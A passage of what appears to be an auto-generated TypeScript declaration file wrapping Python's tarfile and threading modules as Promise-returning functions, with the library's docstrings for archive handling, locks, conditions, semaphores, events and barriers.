be\n\t\t * represented this way, prepend a pax extended header sequence\n\t\t * with supplement information.\n\t\t * \n\t\t */\n\t\tcreate_pax_header(info, encoding): Promise<any>\n\t\tcreate_pax_header$({ info, encoding }): Promise<any>\n\n\t\t/**\n\t\t * Return the object as a pax global header block sequence.\n\t\t * \n\t\t */\n\t\tcreate_pax_global_header(pax_headers): Promise<any>\n\t\tcreate_pax_global_header$({ pax_headers }): Promise<any>\n\n\t\t/**\n\t\t * Construct a TarInfo object from a 512 byte bytes object.\n\t\t * \n\t\t */\n\t\tfrombuf(buf, encoding, errors): Promise<any>\n\t\tfrombuf$({ buf, encoding, errors }): Promise<any>\n\n\t\t/**\n\t\t * Return the next TarInfo object from TarFile object\n\t\t * tarfile.\n\t\t * \n\t\t */\n\t\tfromtarfile(tarfile): Promise<any>\n\t\tfromtarfile$({ tarfile }): Promise<any>\n\n\t\t/**\n\t\t * Return True if the Tarinfo object is a regular file.\n\t\t */\n\t\tisreg(): Promise<any>\n\t\tisreg$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if the Tarinfo object is a regular file.\n\t\t */\n\t\tisfile(): Promise<any>\n\t\tisfile$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a directory.\n\t\t */\n\t\tisdir(): Promise<any>\n\t\tisdir$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a symbolic link.\n\t\t */\n\t\tissym(): Promise<any>\n\t\tissym$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a hard link.\n\t\t */\n\t\tislnk(): Promise<any>\n\t\tislnk$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a character device.\n\t\t */\n\t\tischr(): Promise<any>\n\t\tischr$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a block device.\n\t\t */\n\t\tisblk(): Promise<any>\n\t\tisblk$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is a FIFO.\n\t\t */\n\t\tisfifo(): Promise<any>\n\t\tisfifo$($: {}): Promise<any>\n\t\tissparse(): Promise<any>\n\t\tissparse$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if it is one of character device, block device or FIFO.\n\t\t */\n\t\tisdev(): 
Promise<any>\n\t\tisdev$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * The TarFile Class provides an interface to tar archives.\n\t * \n\t */\n\n\t/**\n\t * Open an (uncompressed) tar archive `name'. `mode' is either 'r' to\n\t * read from an existing archive, 'a' to append data to an existing\n\t * file or 'w' to create a new file overwriting an existing one. `mode'\n\t * defaults to 'r'.\n\t * If `fileobj' is given, it is used for reading or writing data. If it\n\t * can be determined, `mode' is overridden by `fileobj's mode.\n\t * `fileobj' is not closed, when TarFile is closed.\n\t * \n\t */\n\tfunction TarFile(name?, mode?, fileobj?, format?, tarinfo?, dereference?, ignore_zeros?, encoding?, errors?, pax_headers?, debug?, errorlevel?, copybufsize?): Promise<ITarFile>\n\tfunction TarFile$({ name, mode, fileobj, format, tarinfo, dereference, ignore_zeros, encoding, errors, pax_headers, debug, errorlevel, copybufsize }: { name?, mode?, fileobj?, format?, tarinfo?, dereference?, ignore_zeros?, encoding?, errors?, pax_headers?, debug?, errorlevel?, copybufsize?}): Promise<ITarFile>\n\tinterface ITarFile {\n\n\t\t/**\n\t\t * Open a tar archive for reading, writing or appending. Return\n\t\t * an appropriate TarFile class.\n\t\t * \n\t\t * mode:\n\t\t * 'r' or 'r:*' open for reading with transparent compression\n\t\t * 'r:' open for reading exclusively uncompressed\n\t\t * 'r:gz' open for reading with gzip compression\n\t\t * 'r:bz2' open for reading with bzip2 compression\n\t\t * 'r:xz' open for reading with lzma compression\n\t\t * 'a' or 'a:' open for appending, creating the file if necessary\n\t\t * 'w' or 'w:' open for writing without compression\n\t\t * 'w:gz' open for writing with gzip compression\n\t\t * 'w:bz2' open for writing with bzip2 compression\n\t\t * 'w:xz' open for writing with lzma compression\n\t\t * \n\t\t * 'x' or 'x:' create a tarfile exclusively without compression, raise\n\t\t * an exception if the file is already created\n\t\t * 'x:gz' create a gzip compressed tarfile, raise an exception\n\t\t * if the file is already created\n\t\t * 'x:bz2' create a bzip2 compressed tarfile, raise an exception\n\t\t * if the file is already created\n\t\t * 'x:xz' create an lzma compressed tarfile, raise an exception\n\t\t * if the file is already created\n\t\t * \n\t\t * 'r|*' open a stream of tar blocks with transparent compression\n\t\t * 'r|' open an uncompressed stream of tar blocks for reading\n\t\t * 'r|gz' open a gzip compressed stream of tar blocks\n\t\t * 'r|bz2' open a bzip2 compressed stream of tar blocks\n\t\t * 'r|xz' open an lzma compressed stream of tar blocks\n\t\t * 'w|' open an uncompressed stream for writing\n\t\t * 'w|gz' open a gzip compressed stream for writing\n\t\t * 'w|bz2' open a bzip2 compressed stream for writing\n\t\t * 'w|xz' open an lzma compressed stream for writing\n\t\t * \n\t\t */\n\t\topen(name?, mode?, fileobj?, bufsize?): Promise<any>\n\t\topen$({ name, mode, fileobj, bufsize }: { name?, mode?, fileobj?, bufsize?}): Promise<any>\n\n\t\t/**\n\t\t * Open uncompressed tar archive name for reading or writing.\n\t\t * \n\t\t */\n\t\ttaropen(name, mode?, fileobj?): Promise<any>\n\t\ttaropen$({ name, mode, fileobj }: { name, mode?, fileobj?}): Promise<any>\n\n\t\t/**\n\t\t * Open gzip compressed tar archive name for reading or writing.\n\t\t * Appending is not allowed.\n\t\t * \n\t\t */\n\t\tgzopen(name, mode?, fileobj?, compresslevel?): Promise<any>\n\t\tgzopen$({ name, mode, fileobj, compresslevel }: { name, mode?, fileobj?, compresslevel?}): 
Promise<any>\n\n\t\t/**\n\t\t * Open bzip2 compressed tar archive name for reading or writing.\n\t\t * Appending is not allowed.\n\t\t * \n\t\t */\n\t\tbz2open(name, mode?, fileobj?, compresslevel?): Promise<any>\n\t\tbz2open$({ name, mode, fileobj, compresslevel }: { name, mode?, fileobj?, compresslevel?}): Promise<any>\n\n\t\t/**\n\t\t * Open lzma compressed tar archive name for reading or writing.\n\t\t * Appending is not allowed.\n\t\t * \n\t\t */\n\t\txzopen(name, mode?, fileobj?, preset?): Promise<any>\n\t\txzopen$({ name, mode, fileobj, preset }: { name, mode?, fileobj?, preset?}): Promise<any>\n\n\t\t/**\n\t\t * Close the TarFile. In write-mode, two finishing zero blocks are\n\t\t * appended to the archive.\n\t\t * \n\t\t */\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a TarInfo object for member `name'. If `name' cannot be\n\t\t * found in the archive, KeyError is raised. If a member occurs more\n\t\t * than once in the archive, its last occurrence is assumed to be the\n\t\t * most up-to-date version.\n\t\t * \n\t\t */\n\t\tgetmember(name): Promise<any>\n\t\tgetmember$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Return the members of the archive as a list of TarInfo objects. The\n\t\t * list has the same order as the members in the archive.\n\t\t * \n\t\t */\n\t\tgetmembers(): Promise<any>\n\t\tgetmembers$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the members of the archive as a list of their names. It has\n\t\t * the same order as the list returned by getmembers().\n\t\t * \n\t\t */\n\t\tgetnames(): Promise<any>\n\t\tgetnames$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create a TarInfo object from the result of os.stat or equivalent\n\t\t * on an existing file. The file is either named by `name', or\n\t\t * specified as a file object `fileobj' with a file descriptor. If\n\t\t * given, `arcname' specifies an alternative name for the file in the\n\t\t * archive, otherwise, the name is taken from the 'name' attribute of\n\t\t * 'fileobj', or the 'name' argument. The name should be a text\n\t\t * string.\n\t\t * \n\t\t */\n\t\tgettarinfo(name?, arcname?, fileobj?): Promise<any>\n\t\tgettarinfo$({ name, arcname, fileobj }: { name?, arcname?, fileobj?}): Promise<any>\n\n\t\t/**\n\t\t * Print a table of contents to sys.stdout. If `verbose' is False, only\n\t\t * the names of the members are printed. If it is True, an `ls -l'-like\n\t\t * output is produced. `members' is optional and must be a subset of the\n\t\t * list returned by getmembers().\n\t\t * \n\t\t */\n\t\tlist(verbose?: boolean): Promise<any>\n\t\tlist$({ verbose }: { verbose?}): Promise<any>\n\n\t\t/**\n\t\t * Add the file `name' to the archive. `name' may be any type of file\n\t\t * (directory, fifo, symbolic link, etc.). If given, `arcname'\n\t\t * specifies an alternative name for the file in the archive.\n\t\t * Directories are added recursively by default. This can be avoided by\n\t\t * setting `recursive' to False. `filter' is a function\n\t\t * that expects a TarInfo object argument and returns the changed\n\t\t * TarInfo object; if it returns None, the TarInfo object will be\n\t\t * excluded from the archive.\n\t\t * \n\t\t */\n\t\tadd(name, arcname?, recursive?: boolean): Promise<any>\n\t\tadd$({ name, arcname, recursive }: { name, arcname?, recursive?}): Promise<any>
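\n\n\t\t// Example (added): a hedged sketch of the Promise-based TarFile wrappers;\n\t\t// 'example.tar' and 'notes.txt' are illustrative names only, and the\n\t\t// bridge semantics are an assumption of this sketch.\n\t\t//\n\t\t//   const tar = await tarfile.TarFile('example.tar', 'w')\n\t\t//   await tar.add('notes.txt', 'archive/notes.txt')  // arcname renames the member\n\t\t//   await tar.close()            // appends the two finishing zero blocks\n\t\t//   const ro = await tarfile.TarFile('example.tar')  // mode defaults to 'r'\n\t\t//   await ro.getnames()          // ['archive/notes.txt']\n\n\t\t/**\n\t\t * Add the TarInfo object `tarinfo' to the archive. If `fileobj' is\n\t\t * given, it should be a binary file, and tarinfo.size bytes are read\n\t\t * from it and added to the archive. 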
You can create TarInfo objects\n\t\t * directly, or by using gettarinfo().\n\t\t * \n\t\t */\n\t\taddfile(tarinfo, fileobj?): Promise<any>\n\t\taddfile$({ tarinfo, fileobj }: { tarinfo, fileobj?}): Promise<any>\n\n\t\t/**\n\t\t * Extract all members from the archive to the current working\n\t\t * directory and set owner, modification time and permissions on\n\t\t * directories afterwards. `path' specifies a different directory\n\t\t * to extract to. `members' is optional and must be a subset of the\n\t\t * list returned by getmembers(). If `numeric_owner` is True, only\n\t\t * the numbers for user/group names are used and not the names.\n\t\t * \n\t\t */\n\t\textractall(path?, members?): Promise<any>\n\t\textractall$({ path, members }: { path?, members?}): Promise<any>\n\n\t\t/**\n\t\t * Extract a member from the archive to the current working directory,\n\t\t * using its full name. Its file information is extracted as accurately\n\t\t * as possible. `member' may be a filename or a TarInfo object. You can\n\t\t * specify a different directory using `path'. File attributes (owner,\n\t\t * mtime, mode) are set unless `set_attrs' is False. If `numeric_owner`\n\t\t * is True, only the numbers for user/group names are used and not\n\t\t * the names.\n\t\t * \n\t\t */\n\t\textract(member, path?, set_attrs?: boolean): Promise<any>\n\t\textract$({ member, path, set_attrs }: { member, path?, set_attrs?}): Promise<any>\n\n\t\t/**\n\t\t * Extract a member from the archive as a file object. `member' may be\n\t\t * a filename or a TarInfo object. If `member' is a regular file or\n\t\t * a link, an io.BufferedReader object is returned. For all other\n\t\t * existing members, None is returned. If `member' does not appear\n\t\t * in the archive, KeyError is raised.\n\t\t * \n\t\t */\n\t\textractfile(member): Promise<any>\n\t\textractfile$({ member }): Promise<any>\n\n\t\t/**\n\t\t * Make a directory called targetpath.\n\t\t * \n\t\t */\n\t\tmakedir(tarinfo, targetpath): Promise<any>\n\t\tmakedir$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a file called targetpath.\n\t\t * \n\t\t */\n\t\tmakefile(tarinfo, targetpath): Promise<any>\n\t\tmakefile$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a file from a TarInfo object with an unknown type\n\t\t * at targetpath.\n\t\t * \n\t\t */\n\t\tmakeunknown(tarinfo, targetpath): Promise<any>\n\t\tmakeunknown$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a fifo called targetpath.\n\t\t * \n\t\t */\n\t\tmakefifo(tarinfo, targetpath): Promise<any>\n\t\tmakefifo$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a character or block device called targetpath.\n\t\t * \n\t\t */\n\t\tmakedev(tarinfo, targetpath): Promise<any>\n\t\tmakedev$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Make a (symbolic) link called targetpath. If it cannot be created\n\t\t * (platform limitation), we try to make a copy of the referenced file\n\t\t * instead of a link.\n\t\t * \n\t\t */\n\t\tmakelink(tarinfo, targetpath): Promise<any>\n\t\tmakelink$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Set owner of targetpath according to tarinfo. If numeric_owner\n\t\t * is True, use .gid/.uid instead of .gname/.uname. 
If numeric_owner\n\t\t * is False, fall back to .gid/.uid when the search based on name\n\t\t * fails.\n\t\t * \n\t\t */\n\t\tchown(tarinfo, targetpath, numeric_owner): Promise<any>\n\t\tchown$({ tarinfo, targetpath, numeric_owner }): Promise<any>\n\n\t\t/**\n\t\t * Set file permissions of targetpath according to tarinfo.\n\t\t * \n\t\t */\n\t\tchmod(tarinfo, targetpath): Promise<any>\n\t\tchmod$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Set modification time of targetpath according to tarinfo.\n\t\t * \n\t\t */\n\t\tutime(tarinfo, targetpath): Promise<any>\n\t\tutime$({ tarinfo, targetpath }): Promise<any>\n\n\t\t/**\n\t\t * Return the next member of the archive as a TarInfo object, when\n\t\t * TarFile is opened for reading. Return None if there is no more\n\t\t * available.\n\t\t * \n\t\t */\n\t\tnext(): Promise<any>\n\t\tnext$($: {}): Promise<any>\n\t\tdebug\n\t\tdereference\n\t\tignore_zeros\n\t\terrorlevel\n\t\tformat\n\t\tencoding\n\t\terrors\n\t\ttarinfo\n\t\tfileobject\n\t\tOPEN_METH\n\t}\n\tlet version: Promise<any>\n\tlet symlink_exception: Promise<any>\n\tlet NUL: Promise<any>\n\tlet BLOCKSIZE: Promise<any>\n\tlet RECORDSIZE: Promise<any>\n\tlet GNU_MAGIC: Promise<any>\n\tlet POSIX_MAGIC: Promise<any>\n\tlet LENGTH_NAME: Promise<any>\n\tlet LENGTH_LINK: Promise<any>\n\tlet LENGTH_PREFIX: Promise<any>\n\tlet REGTYPE: Promise<any>\n\tlet AREGTYPE: Promise<any>\n\tlet LNKTYPE: Promise<any>\n\tlet SYMTYPE: Promise<any>\n\tlet CHRTYPE: Promise<any>\n\tlet BLKTYPE: Promise<any>\n\tlet DIRTYPE: Promise<any>\n\tlet FIFOTYPE: Promise<any>\n\tlet CONTTYPE: Promise<any>\n\tlet GNUTYPE_LONGNAME: Promise<any>\n\tlet GNUTYPE_LONGLINK: Promise<any>\n\tlet GNUTYPE_SPARSE: Promise<any>\n\tlet XHDTYPE: Promise<any>\n\tlet XGLTYPE: Promise<any>\n\tlet SOLARIS_XHDTYPE: Promise<any>\n\tlet USTAR_FORMAT: Promise<any>\n\tlet GNU_FORMAT: Promise<any>\n\tlet PAX_FORMAT: Promise<any>\n\tlet DEFAULT_FORMAT: Promise<any>\n\tlet SUPPORTED_TYPES: Promise<any>\n\tlet REGULAR_TYPES: Promise<any>\n\tlet GNU_TYPES: Promise<any>\n\tlet PAX_FIELDS: Promise<any>\n\tlet PAX_NAME_FIELDS: Promise<any>\n\tlet PAX_NUMBER_FIELDS: Promise<any>\n\tlet ENCODING: Promise<any>\n}\ndeclare module threading {\n\tvar _\n\n\t/**\n\t * Set a profile function for all threads started from the threading module.\n\t * \n\t * The func will be passed to sys.setprofile() for each thread, before its\n\t * run() method is called.\n\t * \n\t * \n\t */\n\tfunction setprofile(func): Promise<any>\n\tfunction setprofile$({ func }): Promise<any>\n\n\t/**\n\t * Get the profiler function as set by threading.setprofile().\n\t */\n\tfunction getprofile(): Promise<any>\n\tfunction getprofile$($: {}): Promise<any>\n\n\t/**\n\t * Set a trace function for all threads started from the threading module.\n\t * \n\t * The func will be passed to sys.settrace() for each thread, before its run()\n\t * method is called.\n\t * \n\t * \n\t */\n\tfunction settrace(func): Promise<any>\n\tfunction settrace$({ func }): Promise<any>\n\n\t/**\n\t * Get the trace function as set by threading.settrace().\n\t */\n\tfunction gettrace(): Promise<any>\n\tfunction gettrace$($: {}): Promise<any>\n\n\t/**\n\t * Factory function that returns a new reentrant lock.\n\t * \n\t * A reentrant lock must be released by the thread that acquired it. 
Once a\n\t * thread has acquired a reentrant lock, the same thread may acquire it again\n\t * without blocking; the thread must release it once for each time it has\n\t * acquired it.\n\t * \n\t * \n\t */\n\tfunction RLock(): Promise<any>\n\tfunction RLock$($: {}): Promise<any>\n\n\t/**\n\t * Return the current Thread object, corresponding to the caller's thread of control.\n\t * \n\t * If the caller's thread of control was not created through the threading\n\t * module, a dummy thread object with limited functionality is returned.\n\t * \n\t * \n\t */\n\tfunction current_thread(): Promise<any>\n\tfunction current_thread$($: {}): Promise<any>\n\n\t/**\n\t * Return the current Thread object, corresponding to the caller's thread of control.\n\t * \n\t * This function is deprecated, use current_thread() instead.\n\t * \n\t * \n\t */\n\tfunction currentThread(): Promise<any>\n\tfunction currentThread$($: {}): Promise<any>\n\n\t/**\n\t * Return the number of Thread objects currently alive.\n\t * \n\t * The returned count is equal to the length of the list returned by\n\t * enumerate().\n\t * \n\t * \n\t */\n\tfunction active_count(): Promise<any>\n\tfunction active_count$($: {}): Promise<any>\n\n\t/**\n\t * Return the number of Thread objects currently alive.\n\t * \n\t * This function is deprecated, use active_count() instead.\n\t * \n\t * \n\t */\n\tfunction activeCount(): Promise<any>\n\tfunction activeCount$($: {}): Promise<any>\n\n\t/**\n\t * Return a list of all Thread objects currently alive.\n\t * \n\t * The list includes daemonic threads, dummy thread objects created by\n\t * current_thread(), and the main thread. It excludes terminated threads and\n\t * threads that have not yet been started.\n\t * \n\t * \n\t */\n\tfunction enumerate(): Promise<any>\n\tfunction enumerate$($: {}): Promise<any>\n\n\t/**\n\t * Return the main thread object.\n\t * \n\t * In normal conditions, the main thread is the thread from which the\n\t * Python interpreter was started.\n\t * \n\t */\n\tfunction main_thread(): Promise<any>\n\tfunction main_thread$($: {}): Promise<any>\n\n\t/**\n\t * This class implements reentrant lock objects.\n\t * \n\t * A reentrant lock must be released by the thread that acquired it. Once a\n\t * thread has acquired a reentrant lock, the same thread may acquire it\n\t * again without blocking; the thread must release it once for each time it\n\t * has acquired it.\n\t * \n\t * \n\t */\n\tinterface I_RLock {\n\n\t\t/**\n\t\t * Acquire a lock, blocking or non-blocking.\n\t\t * \n\t\t * When invoked without arguments: if this thread already owns the lock,\n\t\t * increment the recursion level by one, and return immediately. Otherwise,\n\t\t * if another thread owns the lock, block until the lock is unlocked. Once\n\t\t * the lock is unlocked (not owned by any thread), then grab ownership, set\n\t\t * the recursion level to one, and return. If more than one thread is\n\t\t * blocked waiting until the lock is unlocked, only one at a time will be\n\t\t * able to grab ownership of the lock. There is no return value in this\n\t\t * case.\n\t\t * \n\t\t * When invoked with the blocking argument set to true, do the same thing\n\t\t * as when called without arguments, and return true.\n\t\t * \n\t\t * When invoked with the blocking argument set to false, do not block. 
If a\n\t\t * call without an argument would block, return false immediately;\n\t\t * otherwise, do the same thing as when called without arguments, and\n\t\t * return true.\n\t\t * \n\t\t * When invoked with the floating-point timeout argument set to a positive\n\t\t * value, block for at most the number of seconds specified by timeout\n\t\t * and as long as the lock cannot be acquired. Return true if the lock has\n\t\t * been acquired, false if the timeout has elapsed.\n\t\t * \n\t\t * \n\t\t */\n\t\tacquire(blocking?: boolean, timeout?): Promise<any>\n\t\tacquire$({ blocking, timeout }: { blocking?, timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Release a lock, decrementing the recursion level.\n\t\t * \n\t\t * If after the decrement it is zero, reset the lock to unlocked (not owned\n\t\t * by any thread), and if any other threads are blocked waiting for the\n\t\t * lock to become unlocked, allow exactly one of them to proceed. If after\n\t\t * the decrement the recursion level is still nonzero, the lock remains\n\t\t * locked and owned by the calling thread.\n\t\t * \n\t\t * Only call this method when the calling thread owns the lock. A\n\t\t * RuntimeError is raised if this method is called when the lock is\n\t\t * unlocked.\n\t\t * \n\t\t * There is no return value.\n\t\t * \n\t\t * \n\t\t */\n\t\trelease(): Promise<any>\n\t\trelease$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Class that implements a condition variable.\n\t * \n\t * A condition variable allows one or more threads to wait until they are\n\t * notified by another thread.\n\t * \n\t * If the lock argument is given and not None, it must be a Lock or RLock\n\t * object, and it is used as the underlying lock. Otherwise, a new RLock object\n\t * is created and used as the underlying lock.\n\t * \n\t * \n\t */\n\tfunction Condition(lock?): Promise<ICondition>\n\tfunction Condition$({ lock }: { lock?}): Promise<ICondition>\n\tinterface ICondition {\n\n\t\t/**\n\t\t * Wait until notified or until a timeout occurs.\n\t\t * \n\t\t * If the calling thread has not acquired the lock when this method is\n\t\t * called, a RuntimeError is raised.\n\t\t * \n\t\t * This method releases the underlying lock, and then blocks until it is\n\t\t * awakened by a notify() or notify_all() call for the same condition\n\t\t * variable in another thread, or until the optional timeout occurs. Once\n\t\t * awakened or timed out, it re-acquires the lock and returns.\n\t\t * \n\t\t * When the timeout argument is present and not None, it should be a\n\t\t * floating point number specifying a timeout for the operation in seconds\n\t\t * (or fractions thereof).\n\t\t * \n\t\t * When the underlying lock is an RLock, it is not released using its\n\t\t * release() method, since this may not actually unlock the lock when it\n\t\t * was acquired multiple times recursively. Instead, an internal interface\n\t\t * of the RLock class is used, which really unlocks it even when it has\n\t\t * been recursively acquired several times. Another internal interface is\n\t\t * then used to restore the recursion level when the lock is reacquired.\n\t\t * \n\t\t * \n\t\t */\n\t\twait(timeout?): Promise<any>\n\t\twait$({ timeout }: { timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Wait until a condition evaluates to True.\n\t\t * \n\t\t * predicate should be a callable which result will be interpreted as a\n\t\t * boolean value. 
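(A hypothetical sketch; `cond` is assumed to implement ICondition and `queue` to be shared state it guards:\n\t\t * \n\t\t * const ok = await cond.wait_for(() => queue.length > 0) // resolves once the predicate is true\n\t\t * )\n\t\t * 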
A timeout may be provided giving the maximum time to\n\t\t * wait.\n\t\t * \n\t\t * \n\t\t */\n\t\twait_for(predicate, timeout?): Promise<any>\n\t\twait_for$({ predicate, timeout }: { predicate, timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Wake up one or more threads waiting on this condition, if any.\n\t\t * \n\t\t * If the calling thread has not acquired the lock when this method is\n\t\t * called, a RuntimeError is raised.\n\t\t * \n\t\t * This method wakes up at most n of the threads waiting for the condition\n\t\t * variable; it is a no-op if no threads are waiting.\n\t\t * \n\t\t * \n\t\t */\n\t\tnotify(n?): Promise<any>\n\t\tnotify$({ n }: { n?}): Promise<any>\n\n\t\t/**\n\t\t * Wake up all threads waiting on this condition.\n\t\t * \n\t\t * If the calling thread has not acquired the lock when this method\n\t\t * is called, a RuntimeError is raised.\n\t\t * \n\t\t * \n\t\t */\n\t\tnotify_all(): Promise<any>\n\t\tnotify_all$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Wake up all threads waiting on this condition.\n\t\t * \n\t\t * This method is deprecated, use notify_all() instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tnotifyAll(): Promise<any>\n\t\tnotifyAll$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * This class implements semaphore objects.\n\t * \n\t * Semaphores manage a counter representing the number of release() calls minus\n\t * the number of acquire() calls, plus an initial value. The acquire() method\n\t * blocks if necessary until it can return without making the counter\n\t * negative. If not given, value defaults to 1.\n\t * \n\t * \n\t */\n\tfunction Semaphore(value?): Promise<ISemaphore>\n\tfunction Semaphore$({ value }: { value?}): Promise<ISemaphore>\n\tinterface ISemaphore {\n\n\t\t/**\n\t\t * Acquire a semaphore, decrementing the internal counter by one.\n\t\t * \n\t\t * When invoked without arguments: if the internal counter is larger than\n\t\t * zero on entry, decrement it by one and return immediately. If it is zero\n\t\t * on entry, block, waiting until some other thread has called release() to\n\t\t * make it larger than zero. This is done with proper interlocking so that\n\t\t * if multiple acquire() calls are blocked, release() will wake exactly one\n\t\t * of them up. The implementation may pick one at random, so the order in\n\t\t * which blocked threads are awakened should not be relied on. There is no\n\t\t * return value in this case.\n\t\t * \n\t\t * When invoked with blocking set to true, do the same thing as when called\n\t\t * without arguments, and return true.\n\t\t * \n\t\t * When invoked with blocking set to false, do not block. If a call without\n\t\t * an argument would block, return false immediately; otherwise, do the\n\t\t * same thing as when called without arguments, and return true.\n\t\t * \n\t\t * When invoked with a timeout other than None, it will block for at\n\t\t * most timeout seconds. If acquire does not complete successfully in\n\t\t * that interval, return false. 
Return true otherwise.\n\t\t * \n\t\t * \n\t\t */\n\t\tacquire(blocking?: boolean, timeout?): Promise<any>\n\t\tacquire$({ blocking, timeout }: { blocking?, timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Release a semaphore, incrementing the internal counter by one or more.\n\t\t * \n\t\t * When the counter is zero on entry and another thread is waiting for it\n\t\t * to become larger than zero again, wake up that thread.\n\t\t * \n\t\t * \n\t\t */\n\t\trelease(n?): Promise<any>\n\t\trelease$({ n }: { n?}): Promise<any>\n\t}\n\n\t/**\n\t * Implements a bounded semaphore.\n\t * \n\t * A bounded semaphore checks to make sure its current value doesn't exceed its\n\t * initial value. If it does, ValueError is raised. In most situations\n\t * semaphores are used to guard resources with limited capacity.\n\t * \n\t * If the semaphore is released too many times it's a sign of a bug.\n\t * \n\t * Like regular semaphores, bounded semaphores manage a counter representing\n\t * the number of release() calls minus the number of acquire() calls, plus an\n\t * initial value. The acquire() method blocks if necessary until it can return\n\t * without making the counter negative. If not given, value defaults to 1.\n\t * \n\t * \n\t */\n\tfunction BoundedSemaphore(value?): Promise<IBoundedSemaphore>\n\tfunction BoundedSemaphore$({ value }: { value?}): Promise<IBoundedSemaphore>\n\tinterface IBoundedSemaphore extends ISemaphore {\n\n\t\t/**\n\t\t * Release a semaphore, incrementing the internal counter by one or more.\n\t\t * \n\t\t * When the counter is zero on entry and another thread is waiting for it\n\t\t * to become larger than zero again, wake up that thread.\n\t\t * \n\t\t * If the number of releases exceeds the number of acquires,\n\t\t * raise a ValueError.\n\t\t * \n\t\t * \n\t\t */\n\t\trelease(n?): Promise<any>\n\t\trelease$({ n }: { n?}): Promise<any>\n\t}\n\n\t/**\n\t * Class implementing event objects.\n\t * \n\t * Events manage a flag that can be set to true with the set() method and reset\n\t * to false with the clear() method. The wait() method blocks until the flag is\n\t * true. The flag is initially false.\n\t * \n\t * \n\t */\n\tfunction Event(): Promise<IEvent>\n\tfunction Event$({ }): Promise<IEvent>\n\tinterface IEvent {\n\n\t\t/**\n\t\t * Return true if and only if the internal flag is true.\n\t\t */\n\t\tis_set(): Promise<any>\n\t\tis_set$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return true if and only if the internal flag is true.\n\t\t * \n\t\t * This method is deprecated, use is_set() instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tisSet(): Promise<any>\n\t\tisSet$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the internal flag to true.\n\t\t * \n\t\t * All threads waiting for it to become true are awakened. Threads\n\t\t * that call wait() once the flag is true will not block at all.\n\t\t * \n\t\t * \n\t\t */\n\t\tset(): Promise<any>\n\t\tset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Reset the internal flag to false.\n\t\t * \n\t\t * Subsequently, threads calling wait() will block until set() is called to\n\t\t * set the internal flag to true again.\n\t\t * \n\t\t * \n\t\t */\n\t\tclear(): Promise<any>\n\t\tclear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Block until the internal flag is true.\n\t\t * \n\t\t * If the internal flag is true on entry, return immediately. 
Otherwise,\n\t\t * block until another thread calls set() to set the flag to true, or until\n\t\t * the optional timeout occurs.\n\t\t * \n\t\t * When the timeout argument is present and not None, it should be a\n\t\t * floating point number specifying a timeout for the operation in seconds\n\t\t * (or fractions thereof).\n\t\t * \n\t\t * This method returns the internal flag on exit, so it will always return\n\t\t * True except if a timeout is given and the operation times out.\n\t\t * \n\t\t * \n\t\t */\n\t\twait(timeout?): Promise<any>\n\t\twait$({ timeout }: { timeout?}): Promise<any>\n\t}\n\n\t/**\n\t * Implements a Barrier.\n\t * \n\t * Useful for synchronizing a fixed number of threads at known synchronization\n\t * points. Threads block on 'wait()' and are simultaneously awoken once they\n\t * have all made that call.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Create a barrier, initialised to 'parties' threads.\n\t * \n\t * 'action' is a callable which, when supplied, will be called by one of\n\t * the threads after they have all entered the barrier and just prior to\n\t * releasing them all. If a 'timeout' is provided, it is used as the\n\t * default for all subsequent 'wait()' calls.\n\t * \n\t * \n\t */\n\tfunction Barrier(parties, action?, timeout?): Promise<IBarrier>\n\tfunction Barrier$({ parties, action, timeout }: { parties, action?, timeout?}): Promise<IBarrier>\n\tinterface IBarrier {\n\n\t\t/**\n\t\t * Wait for the barrier.\n\t\t * \n\t\t * When the specified number of threads have started waiting, they are all\n\t\t * simultaneously awoken. If an 'action' was provided for the barrier, one\n\t\t * of the threads will have executed that callback prior to returning.\n\t\t * Returns an individual index number from 0 to 'parties-1'.\n\t\t * \n\t\t * \n\t\t */\n\t\twait(timeout?): Promise<any>\n\t\twait$({ timeout }: { timeout?}): Promise<any>\n\n\t\t/**\n\t\t * Reset the barrier to the initial state.\n\t\t * \n\t\t * Any threads currently waiting will get the BrokenBarrier exception\n\t\t * raised.\n\t\t * \n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Place the barrier into a 'broken' state.\n\t\t * \n\t\t * Useful in case of error. Any currently waiting threads and threads\n\t\t * attempting to 'wait()' will have BrokenBarrierError raised.\n\t\t * \n\t\t * \n\t\t */\n\t\tabort(): Promise<any>\n\t\tabort$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of threads required to trip the barrier.\n\t\t 